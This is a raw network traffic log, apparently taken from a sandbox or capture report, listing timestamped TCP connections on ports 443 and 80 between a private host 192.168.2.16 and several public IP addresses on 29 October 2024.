                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.139245033 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.139250994 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.165286064 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.181874990 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.251620054 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.292362928 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369441032 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369457006 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369476080 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369482994 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369510889 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369580984 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369611025 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369648933 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.369693041 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.396658897 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.396708012 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.396970034 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.396985054 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.405543089 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.405658960 CET44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.405776978 CET49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486701965 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486742020 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486813068 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486841917 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486859083 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.486884117 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603540897 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603585005 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603647947 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603662014 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603719950 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.603740931 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.720904112 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.720933914 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.721081972 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.721102953 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.721180916 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862170935 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862200975 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862368107 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862390041 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862433910 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862462997 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862555027 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862561941 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862610102 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862981081 CET49763443192.168.2.16151.101.66.137
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:59.862996101 CET44349763151.101.66.137192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:00.694305897 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.343005896 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.387336016 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451888084 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.451937914 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.452001095 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.452234030 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.452251911 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.488723040 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.488805056 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.488882065 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.489659071 CET49758443192.168.2.16104.21.85.92
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.489682913 CET44349758104.21.85.92192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.499073029 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.499135971 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.499248028 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.499516010 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:02.499526978 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.110162020 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.110564947 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.110608101 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.111689091 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.111771107 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.112876892 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.112943888 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.113030910 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.113040924 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.161261082 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255049944 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255361080 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255407095 CET4434976735.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255482912 CET49767443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255842924 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255889893 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.255971909 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.256175995 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.256187916 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.389933109 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.390281916 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.390301943 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.391402006 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.391486883 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.391819954 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.391937971 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.391962051 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.433228970 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.433238983 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.481343031 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763567924 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763619900 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763659000 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763665915 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763690948 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.763739109 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.764008045 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.764273882 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.764314890 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.764322996 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.773811102 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.773909092 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.773917913 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.814237118 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.814253092 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.861211061 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.871952057 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.872226954 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.872245073 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873317003 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873390913 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873682976 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873754025 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873867035 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.873881102 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.887378931 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.887499094 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.887569904 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.887588978 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.901751041 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.901882887 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.901900053 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.907146931 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.907264948 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.907279015 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.916697979 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.916785002 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.916798115 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.924273014 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.956299067 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:03.956314087 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.003202915 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.011061907 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.013799906 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.013881922 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.013894081 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.020916939 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.021258116 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.021306038 CET4434976935.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.021378994 CET49769443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.030886889 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.030949116 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.030991077 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.031002998 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.031068087 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.031075001 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.041033983 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.041115046 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.041125059 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.073246956 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.073304892 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.073364019 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.073378086 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.073455095 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.134748936 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.137330055 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.137433052 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.137449980 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154299974 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154364109 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154400110 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154409885 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154426098 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154459000 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154598951 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154663086 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154757023 CET49766443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:04.154777050 CET44349766142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:05.803227901 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.705054998 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.705100060 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.705199003 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.705488920 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.705501080 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.737502098 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.737600088 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.737715960 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.738007069 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:07.738043070 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.605249882 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.605555058 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.605587006 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.606053114 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.606359005 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.606439114 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.606492996 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.638932943 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.639281034 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.639303923 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.640516043 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.640849113 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.640964985 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.640971899 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.641022921 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.647337914 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.691291094 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.877167940 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902189970 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902250051 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902283907 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902318954 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902371883 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902403116 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902437925 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902545929 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902590036 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.902595043 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.912760019 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.912921906 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.912934065 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.931240082 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.931263924 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.932845116 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.932919025 CET44349773142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.933002949 CET49773443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.936405897 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.936456919 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.936566114 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.936789036 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.936799049 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.962249994 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:08.962276936 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.010242939 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.025300980 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.025499105 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.025551081 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.025573969 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.029030085 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.029118061 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.029133081 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.074249029 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.074285984 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.078203917 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.078320026 CET44349774142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.078397036 CET49774443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.091717958 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.091772079 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.091845036 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.092065096 CET49778443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.092077017 CET44349778142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.188345909 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.188436031 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.188548088 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.188800097 CET49779443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.188815117 CET44349779142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.865211964 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.865508080 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.865546942 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867147923 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867217064 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867525101 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867610931 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867698908 CET49777443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.867707968 CET44349777142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:09.918246984 CET49777443192.168.2.16142.250.184.196
